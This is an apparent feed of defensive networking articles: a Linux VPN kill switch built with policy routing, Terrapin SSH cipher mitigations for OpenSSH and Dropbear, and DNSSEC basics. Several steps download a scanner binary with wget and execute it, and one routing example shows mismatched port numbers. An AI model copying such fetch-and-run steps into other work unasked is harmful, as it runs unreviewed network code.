CIDR notation, gateways and broadcast addresses.&lt;/li&gt;
&lt;li&gt;
How to read the routing table.&lt;/li&gt;
&lt;li&gt;
Is there only one routing table?.&lt;/li&gt;
&lt;li&gt;
Policy-based routing.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;
&lt;li&gt;
VPN kill switch with policy-based routing.

&lt;ul&gt;
&lt;li&gt;
Custom routing table.&lt;/li&gt;
&lt;li&gt;
Custom routing rules.&lt;/li&gt;
&lt;li&gt;Any alternatives?&lt;/li&gt;
&lt;li&gt;
Multiple VPNs.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;
&lt;li&gt;
Conclusion.&lt;/li&gt;
&lt;/ul&gt;

&lt;h1&gt;
  
  
  Linux IP packet routing tour&lt;a&gt;&lt;/a&gt;
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbcwf5rplfbp0ygnldhl3.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbcwf5rplfbp0ygnldhl3.jpg" alt="Photo by Robin Pierre on Unsplash." width="640" height="427"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Before diving into how to implement a kill switch we need to get familiar with how Linux IP packet routing works in general. The best way to do that is to run &lt;code&gt;ip route&lt;/code&gt; command that shows a routing table. On my computer this command outputs the following.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 ip route
default via 10.65.0.1 dev wlan0 proto dhcp src 10.65.0.11 metric 305
10.33.0.0/16 dev vpn1 scope &lt;span class="nb"&gt;link
&lt;/span&gt;10.65.0.0/20 dev wlan0 proto dhcp scope &lt;span class="nb"&gt;link &lt;/span&gt;metric 305
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  CIDR notation, gateways and broadcast addresses&lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;Each row in the table is a rule that matches a particular packet destination in &lt;a href="https://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing#CIDR_notation"&gt;CIDR notation&lt;/a&gt;. For example, &lt;em&gt;10.33.0.0/16&lt;/em&gt; matches any packet with a destination &lt;em&gt;10.33.X.X&lt;/em&gt; where &lt;em&gt;X&lt;/em&gt; is arbitrary number from 0 to 255. Usually the first address &lt;em&gt;10.33.0.1&lt;/em&gt; is the gateway — default packet destination if no rules match the current packet destination — and the last address &lt;em&gt;10.33.255.255&lt;/em&gt; is broadcast address — if you send a packet to this address all nodes in the network will receive it. The reality is more complicated though: you can use any address as the gateway and set any address as broadcast address. Plus broadcast packets are usually only sent to the nodes that are connected to the same network switch and these packets are usually blocked by the network router to prevent accidental flooding.&lt;/p&gt;

&lt;h2&gt;
  
  
  How to read the routing table&lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;Now we can go back to the table to study the rules. In the output default is another way of spelling &lt;em&gt;0.0.0.0/0&lt;/em&gt;, and this rule matches any packet destination.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The first rule says «forward the packet to a gateway with address &lt;em&gt;10.65.0.1&lt;/em&gt; if none of other rules match».&lt;/li&gt;
&lt;li&gt;The second rule says «forward the packet to network device vpn1 if the destination matches &lt;em&gt;10.33.0.0/16&lt;/em&gt;». In this case the device driver or a program that is attached to this device will handle the packet.&lt;/li&gt;
&lt;li&gt;The third rule says «forward the packet to network device &lt;em&gt;wlan0&lt;/em&gt; if the destination matches &lt;em&gt;10.65.0.0/16&lt;/em&gt;». There is no gateway in this rule because the packet's destination is in the same network as the gateway, and Linux sends the packet directly to the destination.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Is there only one routing table?&lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;As you may have guessed there are many routing tables in the system. There is default, local and main table. Each table has the id and the name. The mapping between them is stored in &lt;code&gt;/etc/iproute2/rt_tables&lt;/code&gt; file. Counterintuitively the default table is main. To see the contents of other tables use the following commands.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 ip route show table main
...
🌊 ip route show table &lt;span class="nb"&gt;local&lt;/span&gt;
...
🌊 ip route show table default
...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;On my computer default table does not exist. The local table lists local and broadcast addresses associated with network devices.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 ip route show table &lt;span class="nb"&gt;local
local &lt;/span&gt;10.33.0.41 dev vpn1 proto kernel scope host src 10.33.0.41
&lt;span class="nb"&gt;local &lt;/span&gt;10.65.0.11 dev wlan0 proto kernel scope host src 10.65.0.11
broadcast 10.65.15.255 dev wlan0 proto kernel scope &lt;span class="nb"&gt;link &lt;/span&gt;src 10.65.0.11
&lt;span class="nb"&gt;local &lt;/span&gt;127.0.0.0/8 dev lo proto kernel scope host src 127.0.0.1
&lt;span class="nb"&gt;local &lt;/span&gt;127.0.0.1 dev lo proto kernel scope host src 127.0.0.1
broadcast 127.255.255.255 dev lo proto kernel scope &lt;span class="nb"&gt;link &lt;/span&gt;src 127.0.0.1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Policy-based routing&lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;Linux has another set of rules that define how the table is selected. These rules also have priorities, so if a packet matches multiple rules then the rule with lowest priority is selected. To see all the rules use &lt;code&gt;ip rule&lt;/code&gt; command.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;🌊 ip rule
0:      from all lookup &lt;span class="nb"&gt;local
&lt;/span&gt;32766:  from all lookup main
32767:  from all lookup default
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;On my computer each rule matches any packet (&lt;em&gt;from all&lt;/em&gt; clause in the output), and &lt;em&gt;local&lt;/em&gt; table has lower priority than &lt;em&gt;main&lt;/em&gt;. This is what we will leverage to create a VPN kill switch.&lt;/p&gt;

&lt;h1&gt;
  
  
  VPN kill switch with policy-based routing&lt;a&gt;&lt;/a&gt;
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvifyoh5pt19ps6kjj7m8.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvifyoh5pt19ps6kjj7m8.jpg" alt="Photo by kimi lee on Unsplash" width="640" height="960"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;VPN kill switch requires routing all outgoing traffic through a VPN except for the local traffic and VPN internal traffic. This means that if a VPN uses port 1234, then the traffic from this port should go through the default gateway or directly to the node in the local network. To implement that we will create a separate table and a rule that uses this table for all non-VPN and non-local packets.&lt;/p&gt;

&lt;h2&gt;
  
  
  Custom routing table&lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;First edit &lt;code&gt;/etc/iproute2/rt_tables&lt;/code&gt; file and add the following line that defines our new table.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;83 vpn1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now create rules in the new table. The table itself is created automatically.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# remove existing rules if any&lt;/span&gt;
🌊 ip route flush table vpn1
&lt;span class="c"&gt;# add default route via gateway node from VPN network&lt;/span&gt;
🌊 ip route add default dev vpn1 via 10.83.0.1 table vpn1 metric 100
&lt;span class="c"&gt;# add blackhole route (this is the actual kill switch)&lt;/span&gt;
🌊 ip route add blackhole default table vpn1 metric 200
&lt;span class="c"&gt;# check that the rule has been added&lt;/span&gt;
🌊 ip route show table vpn1
default via 10.83.0.1 dev vpn1 metric 100
blackhole default metric 200
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To summarize, we added new routing table called &lt;em&gt;vpn1&lt;/em&gt;, we added default route via gateway node from VPN and we added so-called blackhole route. Default route is preferred over blackhole route because of the lower metric. The blackhole route is used only when the default is not present in the table. Device &lt;em&gt;vpn1&lt;/em&gt; is automatically deleted whenever VPN is stopped and the corresponding rules are deleted as well, however, blackhole route stays intact.&lt;/p&gt;

&lt;h2&gt;
  
  
  Custom routing rules&lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;Now we will link &lt;em&gt;vpn1&lt;/em&gt; to the &lt;em&gt;main&lt;/em&gt; routing table.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# route all packets except the ones from source port 1234 using the rules from table vpn1&lt;/span&gt;
🌊 ip rule add not sport 1234 table vpn1
&lt;span class="c"&gt;# prefer specific rules in table "main" over the rules in other tables&lt;/span&gt;
🌊 ip rule add table main suppress_prefixlength 0
&lt;span class="c"&gt;# check the rules&lt;/span&gt;
🌊 ip rule
0:      from all lookup &lt;span class="nb"&gt;local
&lt;/span&gt;32764:  from all lookup main suppress_prefixlength 0
32765:  not from all sport 9376 lookup vpn1
32766:  from all lookup main
32767:  from all lookup default
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The first rule is self-explanatory, you can check out all possible alternatives to &lt;em&gt;not sport&lt;/em&gt; in the &lt;a href="https://man7.org/linux/man-pages/man8/ip-rule.8.html"&gt;documentation&lt;/a&gt;. According to the documentation &lt;em&gt;suppress_prefixlength N&lt;/em&gt; option means «reject routing decisions that have a prefix length of &lt;em&gt;N&lt;/em&gt; or less». Prefix length equals zero means default route, hence this rule means «reject routing decisions that match default route in table &lt;em&gt;main&lt;/em&gt;». So, &lt;em&gt;suppress_prefixlength 0&lt;/em&gt; is a fancy way of saying «ignore the default route from the main routing table». Since the next table in the list is &lt;em&gt;vpn1&lt;/em&gt;, then all the traffic except for local networks will go through the &lt;em&gt;vpn1&lt;/em&gt; network interface.&lt;/p&gt;

&lt;h2&gt;
  
  
  Any alternatives?&lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;We tested policy-based VPN kill switch with Wireguard (do not forget to specify the port in the configuration) and Staex. Both VPNs use only one port for their internal traffic. It should be possible to match the traffic of a centralized VPN by source/destination in CIDR notation (&lt;em&gt;from&lt;/em&gt; and &lt;em&gt;to&lt;/em&gt; options of &lt;a href="https://man7.org/linux/man-pages/man8/ip-rule.8.html"&gt;&lt;code&gt;ip rule&lt;/code&gt;&lt;/a&gt; command). In general the exact packets can be marked using &lt;em&gt;iptables&lt;/em&gt; and then matched by the same mark in the routing rules (see &lt;a href="https://man7.org/linux/man-pages/man8/iptables-extensions.8.html"&gt;mark&lt;/a&gt; &lt;em&gt;iptables&lt;/em&gt; module). This &lt;a href="https://www.wireguard.com/netns/"&gt;article&lt;/a&gt; discusses various approaches within the context of Wireguard.&lt;/p&gt;

&lt;h2&gt;
  
  
  Multiple VPNs&lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;The nature of a kill switch does not play well with multiple VPNs. Probably the only way to exclude multiple ports from the default route is to use firewall marks. We have not evaluated this approach yet.&lt;/p&gt;

&lt;h1&gt;
  
  
  Conclusion&lt;a&gt;&lt;/a&gt;
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9p47f07z7ne76gutufmo.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9p47f07z7ne76gutufmo.jpg" alt="Photo by Denys Nevozhai on Unsplash." width="640" height="480"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We conceived kill switch to be a simple VPN feature, however, we underestimated the complexity of Linux networking. Linux has multiple layers of IP packet routing rules, built-in firewall and network namespaces. VPNs do not make this task simpler either: they might use several ports for the internal communication or you might want to run multiple VPNs on a single node.&lt;/p&gt;

&lt;p&gt;Kill switch will be available in the upcoming Staex release. &lt;a href="https://staex.io/blog/subscribe"&gt;Subscribe to our newsletter&lt;/a&gt; to be notified about the new releases.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;We at Staex help our clients make IoT devices first-class citizens in their private networks, protect from common attacks, reduce mobile data usage, and enable audacious use cases that were not possible before. To learn more about our product please visit &lt;a href="https://staex.io/product?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=2024-01-03"&gt;this page&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>linux</category>
      <category>security</category>
      <category>devops</category>
    </item>
    <item>
      <title>Terrapin attack on SSH: what do you need to know</title>
      <dc:creator>Ivan</dc:creator>
      <pubDate>Wed, 27 Dec 2023 17:00:00 +0000</pubDate>
      <link>https://dev.to/staex/terrapin-attack-on-ssh-what-do-you-need-to-know-2ffd</link>
      <guid>https://dev.to/staex/terrapin-attack-on-ssh-what-do-you-need-to-know-2ffd</guid>
      <description>&lt;p&gt;&lt;a href="https://staex.io/blog/terrapin-attack-on-ssh-what-do-you-need-to-know"&gt;Terrapin&lt;/a&gt; is a recent prefix truncation attack on SSH that exploits deficiencies in the protocol specification, namely not resetting sequence number and not authenticating certain parts of handshake transcript. The attack requires man-in-the-middle, i.e. a rogue network node that intercepts the traffic. SSH protocol is used to remotely manage servers and IoT devices and is widely spread. In this article we explain how to secure your servers and devices from this attack.&lt;/p&gt;

&lt;h1&gt;
  
  
  Table of contents
&lt;/h1&gt;

&lt;ul&gt;
&lt;li&gt;How to protect your SSH servers&lt;/li&gt;
&lt;li&gt;Mitigation for OpenSSH&lt;/li&gt;
&lt;li&gt;Mitigation for Dropbear on Debian&lt;/li&gt;
&lt;li&gt;Mitigation for Dropbear on OpenWRT&lt;/li&gt;
&lt;li&gt;Defense in depth&lt;/li&gt;
&lt;/ul&gt;

&lt;h1&gt;
  
  
  How to protect your SSH servers &lt;a&gt;&lt;/a&gt;
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmud5oty9bsmnc1hyrt5x.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmud5oty9bsmnc1hyrt5x.jpg" alt="Photo by Ray Hennessy on Unsplash." width="640" height="426"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;According to the &lt;a href="https://terrapin-attack.com/TerrapinAttack.pdf"&gt;paper&lt;/a&gt; the attack is possible only if you use vulnerable ciphers and encryption modes: ChaCha20-Poly1305, CTR-EtM, CBC-EtM. Note that the ciphers and the encryption modes themselves are not vulnerable, but their input (sequence number) can be manipulated by the attacker.&lt;/p&gt;

&lt;p&gt;To mitigate the attack you either update OpenSSH and Dropbear to the their latest versions (&lt;a href="https://www.openssh.com/txt/release-9.6"&gt;OpenSSH 9.6&lt;/a&gt; and Dropbear 2022.83) or disable the affected ciphers and encryption modes. We will show how to do the latter.&lt;/p&gt;

&lt;h2&gt;
  
  
  Mitigation for OpenSSH &lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;We will show how to disable the affected ciphers on the example of Debian. We will use Docker to make this reproducible. Then we will verify our configuration using &lt;a href="https://github.com/RUB-NDS/Terrapin-Scanner/releases/latest"&gt;vulnerability scanner&lt;/a&gt; provided by the authors of the paper.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# docker run -it --rm debian:latest&lt;/span&gt;
&lt;span class="c"&gt;# then run the following commands&lt;/span&gt;
apt-get update
apt-get &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; wget ssh
&lt;span class="nb"&gt;mkdir&lt;/span&gt; /run/sshd

&lt;span class="c"&gt;# check if ssh is vulnerable&lt;/span&gt;
/usr/sbin/sshd
wget https://github.com/RUB-NDS/Terrapin-Scanner/releases/download/v1.1.0/Terrapin_Scanner_Linux_amd64
&lt;span class="nb"&gt;chmod&lt;/span&gt; +x Terrapin_Scanner_Linux_amd64
./Terrapin_Scanner_Linux_amd64 &lt;span class="nt"&gt;-connect&lt;/span&gt; 127.0.0.1:22
pkill sshd

&lt;span class="c"&gt;# print effective ssh configuration and filter out affected ciphers&lt;/span&gt;
&lt;span class="c"&gt;# '*-cbc' ciphers should be disabled by default&lt;/span&gt;
sshd &lt;span class="nt"&gt;-T&lt;/span&gt; | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-nr&lt;/span&gt; &lt;span class="s1"&gt;'s/(chacha20-poly1305@openssh\.com,|,chacha20-poly1305@openssh\.com)//gip'&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; /etc/ssh/sshd_config

&lt;span class="c"&gt;# re-check ssh&lt;/span&gt;
/usr/sbin/sshd
./Terrapin_Scanner_Linux_amd64 &lt;span class="nt"&gt;-connect&lt;/span&gt; 127.0.0.1:22
pkill sshd
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Mitigation for Dropbear on Debian &lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;To disable the affected ciphers in Dropbear we need to recompile it. Here we show the steps again using a Docker container for the latest Debian and Terrapin scanner.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# docker run -it --rm debian:latest&lt;/span&gt;
&lt;span class="c"&gt;# then run the following commands&lt;/span&gt;
apt-get update
apt-get &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; git wget build-essential zlib1g-dev
git clone https://github.com/mkj/dropbear
&lt;span class="nb"&gt;cd &lt;/span&gt;dropbear
&lt;span class="c"&gt;# here we disable ChaCha20Poly1305 and enable GCM instead&lt;/span&gt;
&lt;span class="c"&gt;# CBC is disabled by default&lt;/span&gt;
&lt;span class="nb"&gt;env &lt;/span&gt;&lt;span class="nv"&gt;CFLAGS&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'-DDROPBEAR_CHACHA20POLY1305=0 -DDROPBEAR_ENABLE_GCM_MODE=1'&lt;/span&gt; ./configure
make
make &lt;span class="nb"&gt;install&lt;/span&gt;

&lt;span class="c"&gt;# check if dropbear is vulnerable&lt;/span&gt;
dropbear &lt;span class="nt"&gt;-R&lt;/span&gt;
wget https://github.com/RUB-NDS/Terrapin-Scanner/releases/download/v1.1.0/Terrapin_Scanner_Linux_amd64
&lt;span class="nb"&gt;chmod&lt;/span&gt; +x Terrapin_Scanner_Linux_amd64
./Terrapin_Scanner_Linux_amd64 &lt;span class="nt"&gt;-connect&lt;/span&gt; 127.0.0.1:22
pkill dropbear
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Mitigation for Dropbear on OpenWRT &lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;For this Linux distribution you need cross compiler to recompile Dropbear. The easiest way to get it is to use &lt;a href="https://github.com/openwrt/docker"&gt;official Docker image&lt;/a&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# docker run -it --rm -v $PWD/bin/:/builder/bin openwrt/sdk:latest&lt;/span&gt;
&lt;span class="c"&gt;# Substitute 'latest' with your router's architecture.&lt;/span&gt;
&lt;span class="c"&gt;# All tags are listed on DockerHub: https://hub.docker.com/r/openwrt/sdk/tags&lt;/span&gt;
&lt;span class="c"&gt;# Then run the following commands.&lt;/span&gt;
./scripts/feeds update &lt;span class="nt"&gt;-a&lt;/span&gt;
make defconfig
&lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="s1"&gt;'s/.*DROPBEAR_CHACHA20POLY1305.*/# CONFIG_DROPBEAR_CHACHA20POLY1305 is not set/'&lt;/span&gt; .config
./scripts/feeds &lt;span class="nb"&gt;install &lt;/span&gt;dropbear
make package/dropbear/compile
make package/index
&lt;span class="c"&gt;# the IPK package is in 'bin' directory&lt;/span&gt;
&lt;span class="c"&gt;# now we will check that dropbear is not vulnerable&lt;/span&gt;
&lt;span class="c"&gt;# (you don't need to repeat this convoluted command)&lt;/span&gt;
&lt;span class="nb"&gt;env &lt;/span&gt;&lt;span class="nv"&gt;LD_LIBRARY_PATH&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;./staging_dir/toolchain-x86_64_gcc-12.3.0_musl/lib ./build_dir/target-x86_64_musl/toolchain/.pkgdir/libc/lib/ld-musl-x86_64.so.1 ./staging_dir/target-x86_64_musl/root-x86/usr/sbin/dropbear &lt;span class="nt"&gt;-R&lt;/span&gt;
wget https://github.com/RUB-NDS/Terrapin-Scanner/releases/download/v1.1.0/Terrapin_Scanner_Linux_amd64
&lt;span class="nb"&gt;chmod&lt;/span&gt; +x Terrapin_Scanner_Linux_amd64
./Terrapin_Scanner_Linux_amd64 &lt;span class="nt"&gt;-connect&lt;/span&gt; 127.0.0.1:22
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Upon exit the package will appear in &lt;code&gt;bin&lt;/code&gt; directory. Then you copy it to your router and update Dropbear.&lt;/p&gt;

&lt;h1&gt;
  
  
  Defense in depth &lt;a&gt;&lt;/a&gt;
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9k2eamluyhucf4etvpfn.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9k2eamluyhucf4etvpfn.jpg" alt="Photo by Julia Solonina on Unsplash." width="640" height="427"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Disabling perfectly fine ciphers might be an overkill. Terrapin attack does not break SSH session integrity, it only allows an attacker to disable keystroke timing obfuscation features of OpenSSH. Disabling ChaCha20Poly1305 in Dropbear (which is often used in embedded devices) would result in increased CPU usage: most embedded CPUs do not have hardware acceleration for AES ciphers which will be used instead.&lt;/p&gt;

&lt;p&gt;The alternative is to establish SSH connection over a VPN. This would add an additional security layer with its own authenticated encryption and trust establishment method. VPNs are not a silver bullet against cyber attacks but a tool to implement &lt;a href="https://en.wikipedia.org/wiki/Defense_in_depth_(computing)"&gt;defense-in-depth&lt;/a&gt; in your system. Knowing that you have another security layer when some protocol is breached gives you peace of mind and much needed time to implement proper mitigations.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;We at Staex help our clients make IoT devices first-class citizens in their private networks, protect from common attacks, reduce mobile data usage, and enable audacious use cases that were not possible before. To learn more about our product please visit this &lt;a href="https://staex.io/product?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=2023-12-27"&gt;page&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>linux</category>
      <category>devops</category>
    </item>
    <item>
      <title>Securing IoT devices from DNS-based attacks</title>
      <dc:creator>Ivan</dc:creator>
      <pubDate>Tue, 19 Dec 2023 12:00:00 +0000</pubDate>
      <link>https://dev.to/staex/securing-iot-devices-from-dns-based-attacks-37og</link>
      <guid>https://dev.to/staex/securing-iot-devices-from-dns-based-attacks-37og</guid>
      <description>&lt;p&gt;DNS protocol is one of the attack vectors on your corporate network and IoT devices in particular. Most operating systems access DNS servers using legacy unencrypted protocol by default despite the fact that there are modern secure enhancements for this protocol: DNSSEC, DNS-over-HTTPS, DNS-over-TLS. In this article we discuss these enhancements and explain how to configure them in your network.&lt;/p&gt;

&lt;h2&gt;
  
  
  Table of contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;What is DNS?&lt;/li&gt;
&lt;li&gt;Cache poisoning attack&lt;/li&gt;
&lt;li&gt;DNS traffic encryption&lt;/li&gt;
&lt;li&gt;Hard-coded DNS servers&lt;/li&gt;
&lt;li&gt;DNS data exfiltration&lt;/li&gt;
&lt;li&gt;Wrap-up&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  What is DNS? &lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;Domain Name System is a protocol that resolves human-readable names into machine-readable IP addresses and vice versa — the address book of the Internet.&lt;/p&gt;

&lt;p&gt;DNS records are stored on the servers that are organized in a tree. Leaves of the tree are managed by cloud providers, internet providers, and other businesses, whereas roots are managed by an international organization &lt;a href="https://en.wikipedia.org/wiki/Internet_Assigned_Numbers_Authority"&gt;IANA&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;DNS was conceived more than thirty years ago (&lt;a href="https://datatracker.ietf.org/doc/html/rfc1035"&gt;RFC 1035&lt;/a&gt;). As such it doesn't have any encryption and trustworthiness built-in. It is easy to spoof DNS name, to spoof DNS server address and to analyze DNS traffic going through your router.&lt;/p&gt;

&lt;h2&gt;
  
  
  Cache poisoning attack &lt;a&gt;&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk4kayzj4oacj43xhs730.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk4kayzj4oacj43xhs730.jpg" alt="Photo by Florian van Duyn on Unsplash." width="640" height="427"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This type of attack involves falsifying DNS records by a corrupt DNS server. These records are cached by downstream servers and eventually reach the clients — your IoT devices and servers. These attacks are sometimes called DNS cache poisoning.&lt;/p&gt;

&lt;p&gt;To mitigate this attack IETF introduced a set of security extensions to DNS collectively called DNSSEC (&lt;a href="https://datatracker.ietf.org/doc/html/rfc9364"&gt;RFC 9364&lt;/a&gt;). These extensions need to be enabled both on the client and on the server side.&lt;/p&gt;

&lt;h3&gt;
  
  
  Mitigating on the server
&lt;/h3&gt;

&lt;p&gt;If DNSSEC is enabled for a particular domain, then there is a RRSIG record for this domain. DNS client needs to verify the signature from this record, if the verification fails then return name resolution failure. Dig command verifies DNSSEC record by default, however, it does not fail when there is no such record. Use the following command to resolve DNS name and print the RRSIG record (&lt;code&gt;+dnssec&lt;/code&gt; flag).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;dig staex.io +dnssec &lt;span class="c"&gt;# should resolve to the ip address&lt;/span&gt;
dig badsign-a.test.dnssec-tools.org +dnssec &lt;span class="c"&gt;# should fail&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Usually DNS providers have an option to enable DNSSEC in their portal. Configuring DNSSEC for your own DNS server is out of scope of this article.&lt;/p&gt;

&lt;h3&gt;
  
  
  Mitigating on the client
&lt;/h3&gt;

&lt;p&gt;To use DNSSEC system-wide you need a capable DNS resolver. One such resolver is &lt;a href="https://dnsprivacy.org/dns_privacy_daemon_-_stubby/"&gt;Stubby&lt;/a&gt;. We will use Stubby in this article because it also supports DNS encryption that we will discuss later.&lt;/p&gt;

